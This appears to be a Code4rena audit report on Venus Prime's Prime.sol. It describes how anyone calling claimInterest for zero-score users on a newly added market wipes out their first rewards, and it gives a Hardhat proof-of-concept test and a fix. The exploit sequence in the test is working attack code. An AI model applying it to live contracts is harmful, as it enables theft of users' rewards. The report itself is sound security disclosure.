Venus Prime - lotux's results

Lines of code

https://github.com/code-423n4/2023-09-venus/blob/b11d9ef9db8237678567e66759003138f2368d23/contracts/Tokens/Prime/Prime.sol#L443

Vulnerability details

Impact

When a new market is added on Prime contract , all users have score = 0 . If an attacker calls claimInterest(address, address) for every eligible user before their score is updated, he can receive the entire reward.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

     it("Test", async () => {
    //INITIAL SETUP
    await prime.addMarket(vbnb.address, bigNumber18.mul(1), bigNumber18.mul(1));
    //update score for attacker
    await prime.updateScores([user1.getAddress()]);
    await protocolShareReserve.getUnreleasedFunds.returns(1000);
    await prime.accrueInterestAndUpdateScore(user1.getAddress(),vbnb.address);
    let accrued1 =await prime.interests(vbnb.address,user1.getAddress());
    console.log(accrued1.toString());
    // OUTPUTS:  900,100000000000000019994,9

   //Call claimInterest for other users with not updated score
    await prime["claimInterest(address,address)"](vbnb.address, user3.getAddress()); 
    let accrued3 =await prime.interests(vbnb.address,user3.getAddress());
    console.log(accrued3.toString());
   // OUTPUTS : 0,100000000000000014529,9
  });

As you can see in the code , user3 's rewardIndex was updated but he didn't receive any reward. This will therefore lead to the loss of the first reward for all users who had Score = 0 when the attacker calls claimInterest(newMarket,victimAddress).

Tools Used

Manual review, Hardhat

Recommended Mitigation Steps

Change _claimInterest from :

    interests[vToken][user].rewardIndex = markets[vToken].rewardIndex;

to :

   if (tokens[user].exists && interests[vToken][user].score != 0){
    interests[vToken][user].rewardIndex = markets[vToken].rewardIndex;
    }

Assessed type

Other